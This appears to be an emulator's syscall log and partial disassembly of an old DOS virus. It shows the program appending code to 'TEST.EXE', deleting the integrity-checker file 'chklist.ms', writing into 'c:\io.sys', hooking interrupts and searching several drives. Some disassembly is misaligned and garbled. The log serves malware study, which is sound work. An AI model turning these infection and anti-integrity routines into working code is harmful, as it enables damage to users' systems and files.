0x1553b: loop 0x1552b
0x1553d: mov ah, 0x2c
0x1553f: int 0x21
0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
2018-12-25T12:23:35.576649346Z 44 PC: 15541 | Get time 0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
0x15555: mov ah, 0x2c
0x15557: int 0x21
0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
2018-12-25T12:23:35.578994744Z 64 PC: 15550 | Write file or device (Write 8 bytes on handle 5)
2018-12-25T12:23:35.587702639Z 44 PC: 15559 | Get time 0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: mov ax, 0x4202
0x15581: xor cx, cx
0x15583: xor dx, dx
0x15585: int 0x21
0x15587: push ax
0x15588: mov cl, 9
2018-12-25T12:23:35.590552955Z 64 PC: 1556c | Write file or device (Write 1207 bytes on handle 5)
2018-12-25T12:23:35.599217372Z 44 PC: 15570 | Get time 0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: mov al, byte ptr [0x5a00]
0x15581: xor cx, dx
0x15583: xor dx, cx
0x15585: iret
0x15586: cmp word ptr [bp + si - 0x57], dx
0x15589: or cx, bx
0x1558b: ljmp 0x11e1:0xc8cb
0x15590: enter -0x67a6, -0x1a
0x15594: sbb word ptr [si], di
0x15596: xchg ax, cx
0x15597: xchg ax, sp
0x15598: retf
0x15599: push es
0x1559a: mov bx, word ptr es:[bp + 0x1cd3]
2018-12-25T12:23:35.602019576Z 64 PC: 1557b | Write file or device (Write 24 bytes on handle 5)
2018-12-25T12:23:35.605229415Z 66 PC: 15587 | Move file pointer
2018-12-25T12:23:35.607017935Z 66 PC: 155a8 | Move file pointer
2018-12-25T12:23:35.62278315Z 64 PC: 155b3 | Write file or device (Write 26 bytes on handle 5)
2018-12-25T12:23:35.625852851Z 67 PC: 15345 | Get or set file attributes
2018-12-25T12:23:35.632282262Z 65 PC: 15349 | Delete file (Filename = 'chklist.ms')
2018-12-25T12:23:35.639168992Z 87 PC: 155cc | Get or set file date and time
2018-12-25T12:23:35.640902422Z 62 PC: 155d0 | Close file
2018-12-25T12:23:35.650610657Z 67 PC: 155da | Get or set file attributes
2018-12-25T12:23:35.661056169Z 79 PC: 1541f | Find next file
2018-12-25T12:23:35.66711929Z 59 PC: 152c0 | Change current directory
2018-12-25T12:23:35.671178145Z 14 PC: 151d5 | Set default drive (Drive = 'C')
2018-12-25T12:23:35.67301218Z 26 PC: 153fd | Set disk transfer address (See above)
2018-12-25T12:23:35.674365032Z 78 PC: 15408 | Find first file (See above)
2018-12-25T12:23:35.680579525Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:35.690499012Z 59 PC: 151e0 | Change current directory
2018-12-25T12:23:35.696638235Z 26 PC: 153fd | Set disk transfer address (See above)
2018-12-25T12:23:35.698065046Z 78 PC: 15408 | Find first file (See above)
2018-12-25T12:23:35.707239108Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:35.712972517Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:36.052916174Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:36.062708093Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:36.06407036Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:36.069726637Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:36.072235817Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:36.075423479Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:36.078516319Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:36.082647808Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:36.088986912Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:36.091654035Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:36.103199464Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:36.106090185Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:36.109019261Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:36.11144248Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:36.119499936Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:36.122416345Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:36.132010031Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:36.138194763Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:36.139757109Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:36.146994385Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:36.156572477Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:36.159501933Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:36.165422472Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:36.183051174Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:36.189803404Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:36.192427168Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:36.199132918Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:36.201326601Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:36.203467423Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:36.206421949Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:36.208807697Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:36.214858781Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:36.218385345Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:36.226065432Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:36.228510431Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:36.232135073Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:36.233483792Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:36.234920809Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:36.238884626Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:36.24474044Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:36.250641741Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:36.253246822Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:36.261639529Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:36.270760821Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:36.274545327Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:36.280767402Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:36.290007439Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:36.297078436Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:36.298477562Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:36.30399448Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:36.306137451Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:36.308245802Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:36.310345775Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:36.313012362Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:36.318992455Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:36.321251955Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:36.33078632Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:36.33292609Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:36.336604852Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:36.338963108Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:36.340248101Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:36.343180377Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:36.349502945Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:36.355973935Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:36.35739746Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:36.66715544Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:36.676792244Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:36.679794909Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:36.685639913Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:36.695917413Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:36.702428837Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:36.703887946Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:36.709700883Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:36.711107059Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:36.713101961Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:36.715255608Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:36.717225403Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:36.723391584Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:36.72626845Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:36.733742229Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:36.736060585Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:36.742870695Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:36.744225313Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:36.745468295Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:36.748900865Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:36.754571331Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:36.761807618Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:36.764679231Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:36.773229436Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:36.782487519Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:36.786582554Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:36.792518469Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:36.801867288Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:36.808816002Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:36.810103816Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:36.815429038Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:36.817276512Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:36.819577335Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:36.821993745Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:36.82532655Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:36.83244378Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:36.834738954Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:36.842339802Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:36.844555253Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:36.847758481Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:36.850502394Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:36.852145343Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:36.855194794Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:36.86197226Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:36.868362673Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:36.870117319Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:36.877444243Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:36.886878281Z 14 PC: 151e9 | Set default drive (Drive = 'D')
2018-12-25T12:23:36.888357722Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:36.893413119Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:36.897934585Z 14 PC: 151f2 | Set default drive (Drive = 'E')
2018-12-25T12:23:36.899276542Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:36.904265054Z 14 PC: 15218 | Set default drive (Drive = 'A')
2018-12-25T12:23:36.905637129Z 59 PC: 15220 | Change current directory
2018-12-25T12:23:36.909644576Z 44 PC: 1523c | Get time 0x1523c: cmp cl, 5
0x1523f: jne 0x15244
0x15241: call 0x1534a
0x15244: cmp cl, 0xd
0x15247: jne 0x1524c
0x15249: call 0x15359
0x1524c: cmp cl, 0x1e
0x1524f: jne 0x15258
0x15251: lea dx, word ptr [bp + 0x290]
0x15255: call 0x15330
0x15258: cmp cl, 0x28
0x1525b: jne 0x15264
0x1525d: lea dx, word ptr [bp + 0x290]
0x15261: call 0x15330
0x15264: cmp cl, 0x32
0x15267: jne 0x15270
0x15269: lea dx, word ptr [bp + 0x2c7]
0x1526d: call 0x15330
0x15270: lea si, word ptr [bp + 0x195]
0x15274: lea di, word ptr [bp + 0x18d]
2018-12-25T12:23:36.913048942Z 67 PC: 15362 | Get or set file attributes
2018-12-25T12:23:36.918362553Z 67 PC: 1536a | Get or set file attributes
2018-12-25T12:23:36.927410192Z 61 PC: 1536f | Open file (Filename = 'c:\io.sys')
2018-12-25T12:23:36.934419956Z 66 PC: 15379 | Move file pointer
2018-12-25T12:23:36.935797672Z 64 PC: 15384 | Write file or device (Write 15 bytes on handle 5)
2018-12-25T12:23:36.939576645Z 62 PC: 15388 | Close file
2018-12-25T12:23:36.944489026Z 67 PC: 15392 | Get or set file attributes
2018-12-25T12:23:36.96400023Z 53 PC: 14fba | Get interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:36.965150483Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.966367519Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.968029279Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.969335633Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.970382644Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.971950441Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.972923342Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.973978081Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.976418783Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.977398464Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.978544521Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.979937627Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.981083506Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.982597723Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.983583412Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.98452686Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.986094915Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.987263301Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.988210808Z 37 PC: 14fcf | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:36.989676013Z 37 PC: 14fd7 | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:23:36.990642119Z 37 PC: 14fdf | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:23:36.991597456Z 37 PC: 14fe7 | Set interrupt vector (Interrupt = '63' AKA 'Read file or device')
2018-12-25T12:23:36.993319535Z 68 PC: 15eab | I/O control for devices (Set for = '� ��O�Э:E�t��ҭ3ɬ� �u��ŝ]_^ZY[�P�/��t�\�ЭXâЭX�SQRWV�������6έ�6̭�6ʭ2ɬ �t:�t��t�����2ɪ���6έ��3����t!�Э �u:E�t��� �u�����}��')
2018-12-25T12:23:37.145053242Z 64 PC: 1563b | Write file or device (Write 0 bytes on handle 1)
2018-12-25T12:23:37.146548408Z 37 PC: 15111 | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:37.148296399Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.149339841Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.150402416Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.152720177Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.15460995Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.156059375Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.158341324Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.160130069Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.161570615Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.163795213Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.165543524Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.166979969Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.169142792Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.17086856Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.172274111Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.17453661Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.175638457Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.176774818Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.178969433Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.180992663Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.183109803Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.18558538Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.187704675Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.189740672Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.192437036Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.194477932Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.196354607Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.198808758Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.200799784Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.202673263Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.205038711Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.206880992Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.208748221Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.211089719Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.212984174Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.214831861Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.217090397Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.218983466Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.220837565Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.223159102Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.225333254Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.227335786Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.229709781Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.232590175Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.235715881Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.23795072Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.239937024Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.242336371Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.253129646Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.255013035Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.257311111Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.260648888Z 76 PC: 15150 | Terminate with return code (Return code = '200')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":30,"Second":0,"TimeBased":true,"OriginalID":9667,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:23:36.153650833Z 25 PC: 15198 | Get default drive
2018-12-25T12:23:36.15611636Z 71 PC: 151a7 | Get current directory
2018-12-25T12:23:36.158948521Z 26 PC: 153fd | Set disk transfer address
2018-12-25T12:23:36.160663431Z 78 PC: 15408 | Find first file
2018-12-25T12:23:36.167437613Z 67 PC: 1542b | Get or set file attributes
2018-12-25T12:23:36.173679968Z 67 PC: 15433 | Get or set file attributes
2018-12-25T12:23:36.196200681Z 61 PC: 15438 | Open file (Filename = 'TEST.EXE')
2018-12-25T12:23:36.202896569Z 87 PC: 1543e | Get or set file date and time
2018-12-25T12:23:36.206513679Z 63 PC: 15455 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:23:36.212756677Z 66 PC: 154a6 | Move file pointer
2018-12-25T12:23:36.214323831Z 44 PC: 1550b | Get time 0x1550b: mov cx, 8
0x1550e: lea di, word ptr [bp + 0x555]
0x15512: inc di
0x15513: shl dx, 1
0x15515: jb 0x1551e
0x15517: mov word ptr [di], 0xf8
0x1551b: jmp 0x15522
0x1551d: nop
0x1551e: mov word ptr [di], 0xfc
0x15522: loop 0x15512
0x15524: mov ah, 0x2c
0x15526: int 0x21
0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
2018-12-25T12:23:36.217464258Z 44 PC: 15528 | Get time 0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
0x1553b: loop 0x1552b
0x1553d: mov ah, 0x2c
0x1553f: int 0x21
0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
2018-12-25T12:23:36.219764685Z 44 PC: 15541 | Get time 0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
0x15555: mov ah, 0x2c
0x15557: int 0x21
0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
2018-12-25T12:23:36.221898305Z 64 PC: 15550 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:23:36.225442141Z 44 PC: 15559 | Get time 0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: mov ax, 0x4202
0x15581: xor cx, cx
0x15583: xor dx, dx
0x15585: int 0x21
0x15587: push ax
0x15588: mov cl, 9
2018-12-25T12:23:36.227942297Z 64 PC: 1556c | Write file or device (Write 1207 bytes on handle 5)
2018-12-25T12:23:36.237069654Z 44 PC: 15570 | Get time 0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: lodsw ax, word ptr [si]
0x1557f: add byte ptr [bx + 0x31], dl
0x15582: fdiv qword ptr [bx + di]
2018-12-25T12:23:36.240568551Z 64 PC: 1557b | Write file or device (Write 21 bytes on handle 5)
2018-12-25T12:23:36.244598806Z 66 PC: 15587 | Move file pointer
2018-12-25T12:23:36.246915078Z 66 PC: 155a8 | Move file pointer
2018-12-25T12:23:36.249241425Z 64 PC: 155b3 | Write file or device (Write 26 bytes on handle 5)
2018-12-25T12:23:36.252688431Z 67 PC: 15345 | Get or set file attributes
2018-12-25T12:23:36.259107297Z 65 PC: 15349 | Delete file (Filename = 'chklist.ms')
2018-12-25T12:23:36.269271082Z 87 PC: 155cc | Get or set file date and time
2018-12-25T12:23:36.270753715Z 62 PC: 155d0 | Close file
2018-12-25T12:23:36.278539889Z 67 PC: 155da | Get or set file attributes
2018-12-25T12:23:36.288978881Z 79 PC: 1541f | Find next file
2018-12-25T12:23:36.291565116Z 59 PC: 152c0 | Change current directory
2018-12-25T12:23:36.295640574Z 14 PC: 151d5 | Set default drive (Drive = 'C')
2018-12-25T12:23:36.297775506Z 26 PC: 153fd | Set disk transfer address (See above)
2018-12-25T12:23:36.299341237Z 78 PC: 15408 | Find first file (See above)
2018-12-25T12:23:36.305314374Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:36.309924894Z 59 PC: 151e0 | Change current directory
2018-12-25T12:23:36.315975759Z 26 PC: 153fd | Set disk transfer address (See above)
2018-12-25T12:23:36.318087137Z 78 PC: 15408 | Find first file (See above)
2018-12-25T12:23:36.32781784Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:36.333653208Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:36.668401182Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:36.675979761Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:36.677611508Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:36.68314595Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:36.685488035Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:36.687744635Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:36.689940255Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:36.692300035Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:36.699807849Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:36.702310273Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:36.712510316Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:36.716092124Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:36.719078036Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:36.720617507Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:36.723451545Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:36.731002667Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:36.739488696Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:36.747097872Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:36.748843455Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:36.755807558Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:36.765934363Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:36.769213371Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:36.775108961Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:36.786185336Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:36.790471119Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:36.791553574Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:36.795851987Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:36.797002279Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:36.798532417Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:36.801138556Z 44 PC: 15541 | Get time (See above)
